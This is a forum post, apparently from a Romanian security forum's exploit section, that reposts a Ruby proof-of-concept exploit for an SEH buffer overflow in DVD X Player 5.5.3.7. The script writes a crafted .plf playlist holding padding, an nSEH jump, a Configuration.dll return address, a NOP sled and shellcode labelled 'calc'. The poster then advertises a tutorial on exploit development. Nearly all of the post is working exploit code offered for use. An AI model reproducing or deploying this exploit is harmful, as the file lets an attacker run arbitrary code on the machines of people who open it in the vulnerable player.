Jump to content
neox

DVD X Player 5.5.3.7 Pro & Standard (SEH) Buffer Overflow

By neox, in Exploituri

Recommended Posts

neox Newbie

neox

Posted
Posted 

#!/usr/bin/env ruby
# Exploit Title:DVD X Player 5.5.3.7 Pro & Standard (SEH) Buffer Overflow 
# Download link :http://www.aviosoft.com/dvd-player.html
# RST
# Author: metacom
# Date (found):03.05.2013
# Date (publish):03.05.2013
# version: 5.5.3.7 Pro & Standard
# Category: poc
# Tested on: windows 7 German 
# Notes: Last Update DVD X Player Jan 28, 2012 
# SOLUTION: None

calc =
"\xba\x38\xdc\x15\x77\xdd\xc7\xd9\x74\x24\xf4\x5d\x33\xc9" +
"\xb1\x33\x83\xc5\x04\x31\x55\x0e\x03\x6d\xd2\xf7\x82\x71" +
"\x02\x7e\x6c\x89\xd3\xe1\xe4\x6c\xe2\x33\x92\xe5\x57\x84" +
"\xd0\xab\x5b\x6f\xb4\x5f\xef\x1d\x11\x50\x58\xab\x47\x5f" +
"\x59\x1d\x48\x33\x99\x3f\x34\x49\xce\x9f\x05\x82\x03\xe1" +
"\x42\xfe\xec\xb3\x1b\x75\x5e\x24\x2f\xcb\x63\x45\xff\x40" +
"\xdb\x3d\x7a\x96\xa8\xf7\x85\xc6\x01\x83\xce\xfe\x2a\xcb" +
"\xee\xff\xff\x0f\xd2\xb6\x74\xfb\xa0\x49\x5d\x35\x48\x78" +
"\xa1\x9a\x77\xb5\x2c\xe2\xb0\x71\xcf\x91\xca\x82\x72\xa2" +
"\x08\xf9\xa8\x27\x8d\x59\x3a\x9f\x75\x58\xef\x46\xfd\x56" +
"\x44\x0c\x59\x7a\x5b\xc1\xd1\x86\xd0\xe4\x35\x0f\xa2\xc2" +
"\x91\x54\x70\x6a\x83\x30\xd7\x93\xd3\x9c\x88\x31\x9f\x0e" +
"\xdc\x40\xc2\x44\x23\xc0\x78\x21\x23\xda\x82\x01\x4c\xeb" +
"\x09\xce\x0b\xf4\xdb\xab\xe4\xbe\x46\x9d\x6c\x67\x13\x9c" +
"\xf0\x98\xc9\xe2\x0c\x1b\xf8\x9a\xea\x03\x89\x9f\xb7\x83" +
"\x61\xed\xa8\x61\x86\x42\xc8\xa3\xe5\x05\x5a\x2f\xc4\xa0" +
"\xda\xca\x18"

junk = "\x41" * 601 # Junk bytes

nseh = "\xEB\x06\x90\x90" # Short (6 bytes) jump!

seh  = "\xB8\x22\x30\x60"#0x603022B8   5E POP ESI from Configuration.dll

nops = "\x90" * 50

head = "http://"
data= head + junk + nseh + seh + nops + calc

File.open("crash.plf", 'w') do |b|  
	b.write data
	puts "file size : " + data.length.to_s
end

neox Newbie

neox

Posted
  • Author
Posted

Acuma sint aproape gata cu tutorial video cu partea doua "Cum dezvolti un exploit" si contine

Fuzzing

Identificarea Offsets

Identificarea Usable Characters

Jmp memory adress

No Operation (NOP)

Shellcode Encoding

Crearea unui modul Metasploit

Proof of Concept

Poc la diverse programe(player etc…) etc.. la multe player si alte programe cu diferite metode :) de la inceput la capat :)

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...